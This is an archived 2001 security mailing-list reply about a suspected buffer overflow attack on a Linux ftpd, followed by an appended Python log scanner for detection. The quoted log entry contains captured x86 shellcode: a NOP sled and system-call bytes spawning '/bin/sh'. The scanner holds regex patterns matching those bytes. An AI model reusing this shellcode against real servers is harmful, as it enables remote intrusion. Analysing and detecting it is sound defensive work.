Security Incidents mailing list archives
Re: Linux ftpd
From: Sam Mingolelli <sam () jake8us org>
Date: Sat, 9 Jun 2001 12:23:56 -0400
This looks like a buffer overflow attack to me. I would make sure that you have the latest patches etc. applied to ftpd. You can browse thru the CERT dbs to see if any info has been posted regarding this.

http://search.cert.org/query.html?rq=0&col=allcert&ht=0&qp=&qs=&qc=&pw=100%25&ws=1&la=&qm=0&st=1&nh=25&lk=1&rf=2&oq=&rq=0&si=1&qt=ftpd

* mrcbis () tin it <mrcbis () tin it> [010609 12:12]:
I have a linux-box running slackware 7.1 with kernel 2.2.18 acting as office-server; we have an internet-connection in dial-up to an ISP near us. Today I was looking into log-files, I found, in /var/log/messages the following message: Jun 3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM 202.239.131.55 [2 02.239.131.55], <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90>1<C0>1<DB>1<C9><B0>F<CD><80>1<C 0>1 <DB>C<89><D9>A<B0>?<CD><80><EB>k^1<C0>1<C9><8D>^^A<88>F^Df<B9><FF>^A<B0>'<C D> <80>1<C0><8D>^^A<B0>=<CD><80>1<C0>1<DB><8D>^^H<89>C^B1<C9><FE><C9>1<C0><8 D>^^H 
<B0>^L<CD><80><FE><C9>u<F3>1<C0><88>F^I<8D>^^H<B0>=<CD><80><FE>^N<B0>0<FE<C8><88>F^D1<C0><88>F^G<89>v^H<89>F^L<89><F3><8D>N^H<8D>V^L<B0>^K<CD><80>1<C0>1 <DB> <B0>^A<CD><80><E8><90><FF><FF><FF>0bin0sh1..11 repeated twice within few minutes. I think it was an intrusion attempt. My linux-box is connected to the internet with dynamic-ip-address. Can someone help me ? Best regards Marco Bisio
--
              \|/
              @-@
------------ooO---(_)--Ooo----------------
| E-Mail:
|   (H): slmingol () bubs f2s com
|   (W): sam.mingo () bigfoot com
|
|   web: http://bubs.dnsq.org/~sam/
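Added example, not part of the original thread: a small Python scanner for the pattern in the log entry quoted above, an anonymous FTP login whose password field carries a long run of <90> bytes (the x86 NOP opcode) and <CD><80> (the Linux int 0x80 system-call instruction). It assumes non-printable bytes are rendered as <XX> as in that entry; the function names, the length threshold and the sample lines are constructed for illustration.

```python
import re

# Assumption: non-printable bytes are rendered as <XX> hex escapes, as in the quoted log.
HEX_ESCAPE = re.compile(r"<[0-9A-Fa-f]{2}>")
NOP_RUN = re.compile(r"(?:<90>\s*){16,}")  # 16 or more consecutive x86 NOP bytes
ANON_LOGIN = re.compile(
    r"ftpd\[(?P<pid>\d+)\]: ANONYMOUS FTP LOGIN FROM \S+ "
    r"\[(?P<ip>[\d. ]+)\], (?P<password>.*)$"
)
MAX_PASSWORD_LEN = 128  # assumed threshold; an e-mail address is far shorter

def inspect_line(line):
    """Return a finding for a suspicious anonymous-login entry, or None."""
    m = ANON_LOGIN.search(line)
    if not m:
        return None
    password = m.group("password")
    reasons = []
    if NOP_RUN.search(password):
        reasons.append("nop-sled")
    if "<CD><80>" in password.upper():
        reasons.append("int-0x80")
    if len(password) > MAX_PASSWORD_LEN:
        reasons.append("oversized-password")
    if not reasons:
        return None
    return {
        "pid": int(m.group("pid")),
        # Line wrapping can split the address, as in "[2 02.239.131.55]".
        "ip": m.group("ip").replace(" ", ""),
        "escaped_bytes": len(HEX_ESCAPE.findall(password)),
        "reasons": reasons,
    }

def scan(lines):
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample lines: documentation addresses, filler bytes instead of a payload.
SAMPLE_LOG = [
    "Jun  3 21:29:40 host ftpd[24301]: ANONYMOUS FTP LOGIN FROM 192.0.2.10 [192.0.2.10], user@example.org",
    "Jun  3 21:30:05 host ftpd[24355]: ANONYMOUS FTP LOGIN FROM 198.51.100.7 [1 98.51.100.7], "
    + "<90>" * 40 + "1<C0><CD><80>",
    "Jun  3 21:31:12 host ftpd[24360]: FTP session closed",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that the bytes were sent; whether the overflow succeeded depends on the ftpd version and patch level, which is what the reply above says to check.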